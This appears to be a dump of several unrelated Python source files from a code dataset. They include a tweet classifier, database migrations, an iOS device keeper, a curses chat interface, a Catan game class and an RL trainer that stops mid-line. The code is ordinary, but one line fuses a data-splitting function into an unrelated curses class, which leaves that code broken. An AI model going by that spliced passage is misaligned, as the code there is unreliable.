tf_idf_cluster(cluster_cluster, clusters_weighted, not_replicated) # only one!\n print('- TF-IDF for clusters done')\n\n l = get_twitter_data()#get list users.. only name\n print('- Target data loaded\\n')\n\n i = 0\n while (i < len(l) - 1):\n list_tweetX, list_tweetY = get_data(l[i], l[i + 1])\n listX_clean = clean_text(list_tweetX)\n listY_clean = clean_text(list_tweetY)\n fdist1 = FreqDist(listX_clean)\n fdist2 = FreqDist(listY_clean)\n most_common1 = fdist1.most_common() # I delete the useless special symbols such as smile, etc...\n most_common2 = fdist2.most_common()\n most_common1.reverse()\n most_common2.reverse()\n main_classifierV2(l[i], l[i + 1], listX_clean, listY_clean,cluster_cluster, clusters_weighted, not_replicated,cluster_label)\n main_classifierV1(l[i], l[i + 1], most_common1[:40], most_common2[:40],tree_hyponyms)\n i += 2\n\n\ndef main_classifierV2(userX,userY,listX_clean,listY_clean,cluster_cluster,clusters_weighted,not_replicated,cluster_label):\n listSimX = []\n listSimY = []\n gold = []\n\n #doc weighted\n doc_weight1=tf_idf(listX_clean,cluster_cluster)\n doc_weight2=tf_idf(listY_clean,cluster_cluster)\n\n alignment_doc_clusters(listX_clean,clusters_weighted,not_replicated,gold)\n\n\n for i in range(0,len(gold)):\n listSimX.append(sim_vectorial(doc_weight1,gold[i],clusters_weighted[i]))\n\n gold.clear()\n alignment_doc_clusters(listY_clean, clusters_weighted, not_replicated, gold)\n\n for i in range(0, len(gold)):\n listSimY.append(sim_vectorial(doc_weight2, gold[i], clusters_weighted[i]))\n\n print('ClassifierV2')\n print(userX,' ',(listSimX),' ',cluster_label[listSimX.index(max(listSimX))])\n print(userY, ' ', (listSimY), ' ', cluster_label[listSimY.index(max(listSimY))],'\\n')\n\n\n\n\nmain_area()\n\n\n\n\n\n\n\n\n\n\n","sub_path":"classifierV2.py","file_name":"classifierV2.py","file_ext":"py","file_size_in_byte":11240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52110756","text":"import json\nimport os\n\nfrom algorithm.tools.experiment import ExperimentFactory\nfrom algorithm.tools.iteration import IterationFactory\nfrom algorithm.policies import SuppDataset, PolicyFactory\nfrom algorithm.tools.statistics import Statistics\nfrom algorithm.tools.utils import Config, mkdir_p\n\n\ndef setup_worker(exp):\n\n config = Config(**exp['config'])\n experiment = ExperimentFactory.create(SuppDataset(exp['dataset']), exp, config, master=False)\n policy = PolicyFactory.create(dataset=SuppDataset(exp['dataset']), exp=exp)\n\n return config, policy, experiment\n\n\ndef setup_master(exp):\n\n _log_dir = 'logs/{}_{}_{}_{}'.format(exp['algorithm'], exp['dataset'],\n exp['policy_options']['net'], os.getpid())\n mkdir_p(_log_dir)\n exp.update({'log_dir': _log_dir})\n\n config = Config(**exp['config'])\n iteration = IterationFactory.create(config, exp)\n experiment = ExperimentFactory.create(SuppDataset(exp['dataset']), exp, config)\n policy = PolicyFactory.create(dataset=SuppDataset(exp['dataset']), exp=exp)\n statistics = Statistics()\n\n if 'from_infos' in exp and exp['from_infos'] is not None:\n with open(exp['from_infos']) as f:\n infos = json.load(f)\n\n statistics.init_from_infos(infos)\n iteration.init_from_infos(infos)\n experiment.init_from_infos(infos)\n\n elif 'from_single' in exp and exp['from_single'] is not None:\n iteration.init_from_single(exp['from_single'], exp, policy)\n else:\n iteration.init_from_zero(exp, policy)\n\n return config, policy, statistics, iteration, experiment\n","sub_path":"src/algorithm/tools/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"126037524","text":"\"\"\"Init database\n\nRevision ID: a16569c96cbf\nRevises: \nCreate Date: 2020-01-04 23:30:51.977791\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'a16569c96cbf'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('users',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('telegram_id', sa.Integer(), nullable=True),\n sa.Column('is_admin', sa.Boolean(), nullable=False),\n sa.Column('created_date', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_users_id'), 'users', ['id'], unique=False)\n op.create_index(op.f('ix_users_telegram_id'), 'users', ['telegram_id'], unique=True)\n op.create_table('categories',\n sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=64), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('created_date', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_categories_id'), 'categories', ['id'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_categories_id'), table_name='categories')\n op.drop_table('categories')\n op.drop_index(op.f('ix_users_telegram_id'), table_name='users')\n op.drop_index(op.f('ix_users_id'), table_name='users')\n op.drop_table('users')\n # ### end Alembic commands ###\n","sub_path":"server/db/migrations/versions/2020_01_04_a16569c96cbf_init_database.py","file_name":"2020_01_04_a16569c96cbf_init_database.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"467090986","text":"from django.contrib.contenttypes import generic\nfrom django.contrib.auth.models import User, Group\nfrom django.db import models\nfrom mezzanine.pages.models import Page, RichText\nfrom mezzanine.core.models import Ownable\nfrom hs_core.models import AbstractResource\n\n#\n# To create a new resource, use these three super-classes. \n#\n\nclass HydromodelResource(Page, RichText, AbstractResource):\n\n # This will save the file in ./static/media/hs/hydromodel\n hm_zip = models.FileField(verbose_name='Model Archive',name='modelzip',upload_to='./hs/hydromodel',\n help_text='Upload Model Archive as *.ZIP')\n\n\n hm_description = models.TextField(verbose_name='Description', null=False,blank=True,default='',\n help_text='Add a short description of the model simulation')\n\n hm_version = models.CharField(verbose_name='Version',null=False,blank=True,default='1.0',\n help_text='Specify the simulation version to distinguish between similar model simulations')\n\n hm_type = models.CharField(verbose_name='Type', default='Instance',\n help_text='Specify the type of HydroModel (e.g. Model Instance, Model Program, etc...')\n # if instance, choose parent model or create parent model\n\n\n #######################\n # TEMPORAL DEFINITION #\n #######################\n # Only for Instance Types\n hm_begin = models.DateTimeField(verbose_name='Simulation Begin',\n help_text='The start date of the model simulation (mm/dd/yyyy hh:mm)')\n hm_end = models.DateTimeField(verbose_name='Simulation End',\n help_text='The end date of the model simulation (mm/dd/yyyy hh:mm)')\n hm_timestep = models.FloatField(verbose_name='Simulation Time Interval',\n help_text='The timestep interval that is used for calculations (in seconds)')\n\n\n\n\n class Meta:\n verbose_name = 'HydroModel'\n\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"517701575","text":"#!/usr/bin/env python3\n# coding: utf-8\n#\n# author: codeskyblue\n\nimport os\nimport threading\nimport time\nimport subprocess\nimport wda\nimport queue\nimport atexit\nimport signal\nimport subprocess\n\n# import wdadb\n\nimport logzero\nfrom logzero import logger\nimport logging\nimport rethinkdb as r\nfrom rethinkdb.errors import RqlRuntimeError, RqlDriverError\n\n_DEVNULL = open(os.devnull, 'wb')\nlogzero.loglevel(logging.INFO)\n\n\nRDB_HOST = os.environ.get('RDB_HOST') or 'localhost'\nRDB_PORT = os.environ.get('RDB_PORT') or 28015\nRDB_DBNAME = os.environ.get(\"RDB_DBNAME\") or \"iOSTest\"\n\n\nclass Database(object):\n def __init__(self):\n conn = r.connect(RDB_HOST, RDB_PORT)\n try:\n r.db_create(RDB_DBNAME).run(conn)\n r.db(RDB_DBNAME).table_create(\"devices\").run(conn)\n print(\"App database created\")\n except (RqlRuntimeError, RqlDriverError):\n print(\"App already exists\")\n\n def _run(self, rsql):\n try:\n c = r.connect(RDB_HOST, RDB_PORT, db=RDB_DBNAME)\n return rsql.run(c)\n except RqlDriverError:\n logger.warning(\"No database connection could be established!\")\n\n def device_save(self, id: str, v: dict):\n ret = self._run(r.table(\"devices\").get(id).update(v))\n if ret['skipped']:\n v['id'] = id\n self._run(r.table(\"devices\").insert(v))\n\n def device_reset(self):\n self._run(r.table(\"devices\").update({\"status\": \"offline\"}))\n\n\n_STATUS_PREPARING = \"preparing\"\n_STATUS_OFFLINE = \"offline\"\n_STATUS_IDLE = \"idle\"\n\n\nclass IDevice(object):\n \"\"\" IOS Device \"\"\"\n\n def __init__(self, udid: str, port: int, hookfunc):\n self._udid = udid\n self._port = port\n self._que = queue.Queue()\n self._hookfunc = hookfunc\n self._name = None\n\n self._iproxy_proc = subprocess.Popen(\n [\"iproxy\", str(port), \"8100\", udid], stdout=_DEVNULL, stderr=_DEVNULL)\n self._wdaproc = None\n self._ok = threading.Event()\n self._ok.set()\n self._output_fd = open(\"logs/%s-wdalog.txt\" % udid, \"wb\")\n self._client = wda.Client(\"http://localhost:%d\" % port)\n self._last_status = None\n self._info = {\n \"udid\": udid,\n \"port\": port,\n \"status\": _STATUS_PREPARING,\n }\n self.init_thread()\n\n @property\n def udid(self):\n return self._udid\n\n @property\n def name(self):\n if self._name:\n return self._name\n self._name = udid2name(self._udid)\n return self._name\n\n def hook(self, status: str):\n \"\"\"\n Hook when status change\n\n Args:\n status: occupied\n \"\"\"\n if not self._hookfunc:\n return\n if self._last_status == status:\n return\n self._last_status = status\n self._info['status'] = status\n self._hookfunc(self, status)\n\n def set_offline(self):\n self._ok.clear()\n\n def init_thread(self):\n logger.info(\"%s start watch thread\", self._udid)\n self._wth = threading.Thread(\n target=self._watch, name=self._udid + \":watch\")\n self._wth.daemon = True\n self._wth.start()\n\n def start_wda(self):\n if self._wdaproc:\n logger.warning(\"wda proc thread is already started\")\n return\n self._wda_started = time.time()\n self._wdaproc = subprocess.Popen(\n ['sh', 'runwda.sh', self._udid], stdout=_DEVNULL, stderr=self._output_fd)\n\n def stop_wda(self):\n logger.info(\"%s WDA stopped\", self._udid)\n if self._wdaproc is None:\n logger.warning(\"%s wda is already killed\", self._udid)\n return\n self._wdaproc.terminate()\n self._wdaproc = None\n\n def is_wda_ok(self):\n try:\n resp = self._client.status()\n self._info['ip'] = resp['ios']['ip']\n return True\n except:\n return False\n\n def _watch(self):\n while True:\n if self._ok.is_set():\n if not self._wdaproc:\n logger.info(\"%s start WDA\", self._udid)\n self.start_wda()\n # should check here\n if self.is_wda_ok():\n self.hook(_STATUS_IDLE)\n logger.debug(\"%s WDA is ready to use\", self._udid)\n else:\n self.hook(_STATUS_PREPARING)\n logger.debug(\"%s WDA is still waiting\", self._udid)\n\n if time.time() - self._wda_started > 30:\n logger.warning(\n \"%s WDA is down, restart after 3s\", self._udid)\n self.stop_wda() # restart\n time.sleep(3)\n else:\n self.hook(_STATUS_OFFLINE)\n self.stop_wda()\n self._ok.wait()\n\n\ndef is_port_in_use(port):\n import socket\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n return s.connect_ex(('localhost', port)) == 0\n\n\n__port = 8100\n\n\ndef free_port():\n global __port\n for i in range(20):\n if not is_port_in_use(__port + i):\n __port += i\n return __port\n raise RuntimeError(\"No free port can be found, should not happens\")\n\n\ndevice_ports = {}\n\n\ndef get_device_port(udid: str):\n if udid in device_ports:\n return device_ports[udid]\n port = free_port()\n device_ports[udid] = port\n return port\n\n\ndef runcommand(*args, check=False):\n p = subprocess.run(args, capture_output=True, check=check)\n return p.stdout.strip().decode('UTF-8')\n\n\ndef udid2name(udid):\n try:\n return runcommand('idevicename', '-u', udid, check=True)\n except subprocess.CalledProcessError:\n return None\n\n\ndef list_udids():\n \"\"\"\n Returns:\n list of udid\n \"\"\"\n udids = runcommand('idevice_id', '-l').splitlines()\n return udids\n\n\ndef main():\n idevices = {}\n\n # stop all process\n os.setpgrp()\n\n def cleanup():\n os.killpg(0, signal.SIGKILL)\n\n atexit.register(cleanup)\n\n # init all\n os.makedirs(\"logs\", exist_ok=True)\n db = Database()\n db.device_reset()\n\n def hookfunc(idevice, status):\n \"\"\" id, name, port, status \"\"\"\n udid = idevice.udid\n info = idevice._info.copy()\n info['id'] = info.pop('udid')\n info['name'] = idevice.name or 'unknown'\n db.device_save(udid, info)\n logger.info(\">>> %s [%s]\", udid, status)\n\n last_udids = []\n while True:\n curr_udids = list_udids()\n offlines = set(last_udids).difference(curr_udids)\n onlines = set(curr_udids).difference(last_udids)\n last_udids = curr_udids\n\n for udid in onlines:\n port = get_device_port(udid)\n logger.info(\"UDID: %s came online, port: %d\", udid, port)\n if udid not in idevices:\n idevices[udid] = IDevice(\n udid, port, hookfunc)\n idevices[udid]._ok.set()\n\n for udid in offlines:\n logger.warning(\"UDID: %s went offline\" % udid)\n # start iproxy and wda watch(start wda, pull status() and check if cmd finished)\n idevices[udid].set_offline()\n time.sleep(.5)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"wdakeeper.py","file_name":"wdakeeper.py","file_ext":"py","file_size_in_byte":7326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"300409856","text":"# from sklearn.model_selection import train_test_split\n# import pandas as pd\nimport numpy as np\n\ndef data_to_test_train(input_file = \"outputs/label_out.csv\",\n train_out = \"outputs/train_out.csv\",\n test_out = \"outputs/test_out.csv\",\n test_ratio = 0.2,\n verbose=False):\n # input_file = \"data/label_out.csv\"\n # df = pd.read_csv(data_file, sep=\",\")\n data = np.genfromtxt(input_file, delimiter=',',skip_header=True)\n n = data.shape[0]\n if verbose: print(data.shape)\n # n=10\n if verbose:print(n)\n # test_ratio = 0.2\n test_size = int(n * test_ratio)\n audio_unique, count_unique = np.unique(data[:,0],return_counts=True)\n # audio_train = audio_unique[:int(audio_unique.shape[0]/2)]\n # audio_test = audio_unique[int(audio_unique.shape[0]/2):]\n test_len = 0\n test = []\n test_n = []\n tmp_audio_uniq = np.arange(audio_unique.shape[0])\n while(test_len self.top():\n self.current_line -= 1\n\n def scroll_down(self):\n if self.current_line < self.bottom():\n self.current_line += 1\n\n def top(self):\n return 0\n\n def bottom(self):\n return self.height - self.screen_height()\n\n def cursor_to_bottom(self):\n for i in range(0,self.height):\n try:\n self.pad.addch(ord('\\n'))\n except curses.error:\n pass\n\n def infinite_scroll(self):\n self.pad.scrollok(True)\n self.cursor_to_bottom()\n self.current_line = self.bottom()\n\n # shorthand \n def addstr(self, a1, a2=None, a3=None, a4=None):\n if a2==None:\n try:\n self.pad.addstr(a1)\n except curses.error:\n pass\n elif a3==None:\n try:\n self.pad.addstr(a1,a2)\n except curses.error:\n pass\n elif a4==None:\n try:\n self.pad.addstr(a1,a2,a3)\n except curses.error:\n pass\n else:\n try:\n self.pad.addstr(a1,a2,a3,a4)\n except curses.error:\n pass\n\n\n#-----------Functions-------------\n\n# gracefully close curses\ndef close_curses():\n curses.echo()\n curses.nocbreak()\n stdscr.keypad(0)\n curses.endwin()\n\n# set the colors\ndef set_colors():\n curses.start_color()\n curses.use_default_colors()\n curses.init_pair(1, 3, -1)\n curses.init_pair(2, 6, -1)\n\ndef max_x():\n y,x = stdscr.getmaxyx()\n return x\n\ndef max_y():\n y,x = stdscr.getmaxyx()\n return y\n\n# pad which holds contacts in order of most recent communication\n# uses \n# TODO get recent convo data slapped into here\ndef create_recents():\n # init\n recents = ScrollyPad(100, max_x(), 0,0, 3,max_x())\n \n # set text\n recents.addstr(0, 0, \"3* Test Man\")\n recents.addstr(1, 0, \"2* First Last\")\n recents.addstr(2, 0, \"2* John Doe\")\n recents.addstr(3, 0, \" * Joe Doe\")\n recents.addstr(4, 0, \" * Mr. Not Visible Without Scroll\")\n recents.addstr(5, 0, \" * Sir\")\n recents.addstr(6, 0, \" * Buzz Lightyear\")\n\n return recents\n\n# generates a conversation header holdering the conversation name\n#TODO auto width of \"=\"; maybe a max width and a min number of ='s on the left side (like 2 or 4?)\ndef get_convo_header(name):\n return \"==================\" + name + \"==================\"\n\n# pad which holds the current conversation\n# uses a newline at the end of each message so that each message is fully displayed\n# TODO get convo data slapped into here\ndef create_convo():\n # init\n convo = ScrollyPad(1000,max_x(), recents.screen_height()+1,0, max_y()-message.screen_height(),max_x()) #TODO +1 is for the decorations. Maybe integrate the decorations into convo \n convo.infinite_scroll()\n\n # set text\n convo.addstr(\"T: sup foo\\n\", curses.color_pair(2))\n convo.addstr(\"N: nm bruh, jst chiln\\n\")\n convo.addstr(\"T: Bruh bruh asdlfkjasdfl;kjasdfjklahsdflkjahsdflkjhasdflkjhasdflkjhasdflkjhasdflkjhasdflkjhasdflkjhasdflkjahsdflkjahsdflkjahsdflkjahsdflkajhsdf end of long thing (hey it wrapped!!)\\n\", curses.color_pair(2))\n convo.addstr(\"N: This should block your wrapped message, T!! :P\\n\")\n convo.addstr(\"T: Ha! It didn't block my wrapped message because you learned that addstr keeps track of your cursor position!!\\n\", curses.color_pair(2))\n convo.addstr(\"N: I wish I never figured that out :'(\\n\")\n convo.addstr(\"T: Too late! My keyboard spam is already in our convo!\\n\", curses.color_pair(2))\n\n return convo\n\n# create a pad ta static method doesn't know its class or instanceo hold a typed message\n# TODO pad should grow as message is typed (*cough* noutrefesh doupdate *cough*)\ndef create_message():\n # init\n message = ScrollyPad(100, max_x(), max_y()-1,0, max_y()-1,max_x()) \n message.infinite_scroll()\n\n # set text\n message.addstr(\"N: \", curses.A_BOLD)\n\n return message\n\n# ----------------MAlN-------------------\n\n# constants\nmsg_height = 0\n\n# init curses\nstdscr = curses.initscr()\n#curses.noecho()\ncurses.cbreak()\nstdscr.keypad(1)\n#atexit.register(close_curses)\nset_colors()\n\n# create pads\nrecents = create_recents()\nmessage = create_message()\nconvo = create_convo()\nstdscr.addstr(recents.screen_height(), 0,get_convo_header(\"Time\"), curses.color_pair(2)) \n\n# set up curses interface (ie tests on stdscr) stdscr.addstr(7, 0, \"A hectic hello to Curses!!!\", curses.A_STANDOUT)\n\n# refresh screens\nstdscr.noutrefresh()\nrecents.refresh()\nconvo.refresh()\nmessage.refresh()\ncurses.doupdate()\n\nstdscr.getch()\n\nclose_curses()\n","sub_path":"shexter_client/shexter_tui.py","file_name":"shexter_tui.py","file_ext":"py","file_size_in_byte":5306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"546396089","text":"from common import Watch\n\nWatch.start()\nlim = 100\nways = [1] + [0] * lim\nfor n in range(1, lim + 1):\n for i in range(n, lim + 1):\n ways[i] += ways[i - n]\nprint(ways[lim] - 1)\nWatch.stop()\n ","sub_path":"50_99/src/task76/s76.py","file_name":"s76.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"566276994","text":"# Copyright (C) 2020 Google Inc.\n# Licensed under http://www.apache.org/licenses/LICENSE-2.0 \n\n\"\"\"\nResolve duplicates in access_control_people\n\nCreate Date: 2019-04-04 09:11:21.904685\n\"\"\"\n# disable Invalid constant name pylint warning for mandatory Alembic variables.\n# pylint: disable=invalid-name\n\nimport logging\nimport sqlalchemy as sa\n\nfrom alembic import op\n\n\n# revision identifiers, used by Alembic.\nrevision = '014ddab36256'\ndown_revision = 'adf7bdb8996e'\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef remove_duplicates(connection):\n \"\"\"Remove duplicates from table if any\"\"\"\n\n # Get list of duplicated IDs fto be removed:\n # inner SELECT returns MIN IDs (i.e. original ones,\n # for which duplicates exist)\n # outer SELECT returns ID which are duplicates (i.e. exclude original ones)\n dup_items = list(connection.execute(\n sa.text(\n \"\"\"\n SELECT\n acp.id, acp.person_id, acp.ac_list_id\n FROM\n access_control_people acp\n JOIN\n (SELECT\n MIN(acp1.id) AS id,\n acp1.person_id AS person_id,\n acp1.ac_list_id AS ac_list_id\n FROM\n access_control_people acp1\n GROUP BY acp1.person_id , acp1.ac_list_id\n HAVING COUNT(*) > 1) acp2 ON acp.person_id = acp2.person_id\n AND acp.ac_list_id = acp2.ac_list_id\n WHERE\n acp.id != acp2.id\n \"\"\"))\n )\n\n if dup_items:\n logging.warning(\n '[rev:%s] Duplicated items:\\n%s', revision,\n '\\n'.join('id={} person_id={} ac_list_id={}'.format(\n i.id, i.person_id, i.ac_list_id\n ) for i in dup_items)\n )\n else:\n logging.warning(\"[rev:%s] No duplicated items found\", revision)\n return\n\n dup_ids = list(i.id for i in dup_items)\n\n # Remove duplicated\n connection.execute(\n sa.text(\"DELETE FROM access_control_people WHERE id IN :orig_ids\"),\n orig_ids=dup_ids\n )\n\n\ndef add_constraint(connection):\n \"\"\"Add constraint to make person_id/ac_list_id pair unique in DB\"\"\"\n connection.execute(\"\"\"\n ALTER TABLE access_control_people\n ADD CONSTRAINT uq_access_control_people\n UNIQUE (person_id, ac_list_id);\n \"\"\")\n\n\ndef upgrade():\n \"\"\"Upgrade database schema and/or data, creating a new revision.\"\"\"\n\n connection = op.get_bind()\n\n remove_duplicates(connection)\n add_constraint(connection)\n\n\ndef downgrade():\n \"\"\"Downgrade database schema and/or data back to the previous revision.\"\"\"\n raise NotImplementedError(\"Downgrade is not supported\")\n","sub_path":"src/ggrc/migrations/versions/20190404_014ddab36256_resolve_duplicates_in_access_control_.py","file_name":"20190404_014ddab36256_resolve_duplicates_in_access_control_.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"461144576","text":"import time\r\nfrom .mylog import logger as lg\r\n\r\n\r\ndef timeur(func):\r\n def wrapper(*args, **kwargs):\r\n debut = time.clock()\r\n func(*args, **kwargs)\r\n fin = time.clock()\r\n temps = round(fin - debut, 2)\r\n lg.info(f\"Fonction {func.__name__} exécutée en {temps} secondes\")\r\n return wrapper\r\n","sub_path":"utils/decorateurs.py","file_name":"decorateurs.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"59902505","text":"from random import randint\nfrom actions import Turn\n\n\nclass Game(object):\n def __init__(self, players, board):\n self.players = players\n self.board = board\n self.dice = None\n self.previous_player = None\n self.current_player = None\n self.robber = None\n self.turn = None\n\n def seat_players(self):\n n = len(self.players)\n i = 0\n for p in self.players:\n if i == (n - 1):\n i = 0\n p.next_player = self.players[i]\n i += 1\n\n def player_turn(self, player):\n \"\"\"\n Advances to the next player\n :param player: \n :return: \n \"\"\"\n self.previous_player = self.current_player\n self.current_player = player\n self.dice = None\n print(\"Current turn: Player #\", self.current_player.player_id)\n self.turn = Turn(self.board, player)\n\n def pregame(self, turns_list):\n while turns_list:\n self.player_turn(self.players[turns_list[0]])\n self.wait_for_player_input_sett()\n self.wait_for_player_input_road()\n del turns_list[0]\n self.seat_players()\n print(\"Game starts now\")\n print(\"Current turn: Player \", self.current_player.player_id)\n self.roll_dice()\n\n def wait_for_player_input_road(self):\n valid = False\n options = set([])\n for s in self.current_player.settlements_built:\n for r in s.neighbour_roads:\n if r.available:\n options.add(r.road_id)\n while not valid:\n road_id = int(input(\"Player #{}, where would you like to build a road: \"\n .format(self.current_player.player_id)))\n if road_id not in list(range(0, 72)):\n print(\"Not a valid road id\")\n continue\n if road_id not in options:\n print(\"Not an optional road id\")\n continue\n if self.road_spot_available(road_id):\n valid = True\n else:\n print(\"Not an optional road id\")\n self.build_road(road_id)\n\n def wait_for_player_input_sett(self):\n valid = False\n while not valid:\n sett_id = int(input(\"Player #{}, where would you like to build a settelment: \"\n .format(self.current_player.player_id)))\n if sett_id not in list(range(0, 54)):\n print(\"Not a valid settelment id\")\n continue\n if self.sett_spot_available(sett_id):\n valid = True\n else:\n print(\"Not an optional spot\")\n self.build_first_settelment(sett_id)\n\n @staticmethod\n def first_player(number_of_players):\n first = randint(0, number_of_players)\n players = list(range(first, number_of_players))\n if first is not 0 or number_of_players-1:\n for i in list(range(0, first)):\n players.append(i)\n for i in reversed(players):\n players.append(i)\n elif first is 0:\n for i in reversed(players):\n players.append(i)\n else:\n for i in list(range(0, number_of_players)):\n players.append(i)\n for i in reversed(players):\n players.append(i)\n return players\n\n\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"170689816","text":"\"\"\"Train the triad model\"\"\"\nimport argparse\nimport os\nimport pickle\n\nfrom src.build_data import build_dataFrame, DataGen\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"train_dir\",\n help=\"Directory containing training annotations\")\n\n parser.add_argument(\"model_destination\",\n help=\"Where to store the trained model\")\n\n parser.add_argument(\"--val_dir\",\n default=None,\n help=\"Directory containing validation annotations\")\n\n parser.add_argument(\"--neg_ratio\",\n default=0.8,\n type=float,\n help=\"negative cases ratio for downsampling. e.g. 0.5 means 50% instances are negative.\")\n\n parser.add_argument(\"--load_model\",\n action='store_true',\n default=False,\n help=\"Load saved model and resume training from there\")\n\n parser.add_argument(\"--epochs\",\n default=400,\n type=int,\n help=\"Load saved model and resume training from there\")\n\n parser.add_argument(\"--keras\",\n action='store_true',\n default=False,\n help=\"Use keras model\")\n\n args = parser.parse_args()\n\n assert os.path.isdir(args.train_dir)\n assert os.path.isdir(args.model_destination)\n\n train_gen = DataGen(build_dataFrame(args.train_dir, threads=3))\n with open(os.path.join(args.model_destination, 'word_indexes.pkl'), 'wb') as f:\n pickle.dump(train_gen.word_indexes, f)\n with open(os.path.join(args.model_destination, 'pos_tags.pkl'), 'wb') as f:\n pickle.dump(train_gen.pos_tags, f)\n\n if args.keras: # keras model\n from src.keras_models import train\n train(train_gen=train_gen,\n model_destination=args.model_destination,\n val_dir=args.val_dir,\n load_model=args.load_model,\n epochs=args.epochs)\n else: # pytorch model\n from src.torch_models import train\n train(train_gen=train_gen,\n model_destination=args.model_destination,\n val_dir=args.val_dir,\n load_model=args.load_model,\n epochs=args.epochs)\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"train_triad.py","file_name":"train_triad.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"31298604","text":"import argparse\nimport random\nimport json\nimport numpy as np\nimport copy\nfrom collections import defaultdict\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\n\nfrom core.controller import Controller\nfrom .utterance import UtteranceBuilder\n\nfrom tensorboardX import SummaryWriter\n\nfrom neural.rl_trainer import RLTrainer as BaseTrainer\nfrom neural.sl_trainer import Statistics, SimpleLoss\n\nimport math, time, sys\n\n\nclass RLStatistics(Statistics):\n \"\"\"\n Accumulator for loss statistics.\n Currently calculates:\n\n * accuracy\n * perplexity\n * elapsed time\n \"\"\"\n def __init__(self, loss=0, reward=0, n_words=0):\n self.loss = loss\n self.n_words = n_words\n self.n_src_words = 0\n self.reward=reward\n self.start_time = time.time()\n\n def update(self, stat):\n self.loss += stat.loss\n self.n_words += stat.n_words\n self.reward += stat.reward\n\n def mean_loss(self):\n return self.loss / self.n_words\n\n def mean_reward(self):\n return self.reward / self.n_words\n\n def elapsed_time(self):\n return time.time() - self.start_time\n\n def ppl(self):\n return math.exp(min(self.loss / self.n_words, 100))\n\n def str_loss(self):\n return \"loss: %6.4f reward: %6.4f;\" % (self.mean_loss(), self.mean_reward())\n\n def output(self, epoch, batch, n_batches, start):\n \"\"\"Write out statistics to stdout.\n\n Args:\n epoch (int): current epoch\n batch (int): current batch\n n_batch (int): total batches\n start (int): start time of epoch.\n \"\"\"\n t = self.elapsed_time()\n print((\"Epoch %2d, %5d/%5d;\" + self.str_loss() +\n \"%6.0f s elapsed\") %\n (epoch, batch, n_batches,\n time.time() - start))\n sys.stdout.flush()\n\nclass SimpleCriticLoss(nn.Module):\n def __init__(self):\n super(SimpleCriticLoss, self).__init__()\n self.criterion = nn.MSELoss()\n\n # def _get_correct_num(self, enc_policy, tgt_intents):\n # enc_policy = enc_policy.argmax(dim=1)\n # tmp = (enc_policy == tgt_intents).cpu().numpy()\n # tgt = tgt_intents.data.cpu().numpy()\n # tmp[tgt==19] = 1\n # import numpy as np\n # return np.sum(tmp)\n\n def forward(self, pred, oracle, pmask=None):\n loss = self.criterion(pred, oracle)\n stats = self._stats(loss, pred.shape[0])\n return loss, stats\n\n def _stats(self, loss, data_num):\n return RLStatistics(loss=loss.item(), n_words=data_num)\n\nclass RLTrainer(BaseTrainer):\n def __init__(self, agents, scenarios, train_loss, optim, training_agent=0, reward_func='margin',\n cuda=False, args=None):\n super(RLTrainer, self).__init__(agents, scenarios, train_loss, optim,\n training_agent, reward_func, cuda, args)\n # print('training_agent', training_agent)\n self.model_type = args.model_type\n self.use_utterance = False\n\n def _run_batch_a2c(self, batch):\n value = self._run_batch_critic(batch)\n policy, price, pvar = self._run_batch(batch)\n # print('max price', torch.max(price))\n return value, policy, price, pvar\n\n def _gradient_accumulation(self, batch_iter, reward, model, critic, discount=0.95):\n # Compute losses\n model.train()\n critic.train()\n\n values = []\n p_losses = []\n e_losses = []\n penalties = []\n\n # batch_iter gives a dialogue\n policy_stats = Statistics()\n for_value = False\n\n for i, batch in enumerate(batch_iter):\n # print(\"batch: \\nencoder{}\\ndecoder{}\\ntitle{}\\ndesc{}\".format(batch.encoder_inputs.shape, batch.decoder_inputs.shape, batch.title_inputs.shape, 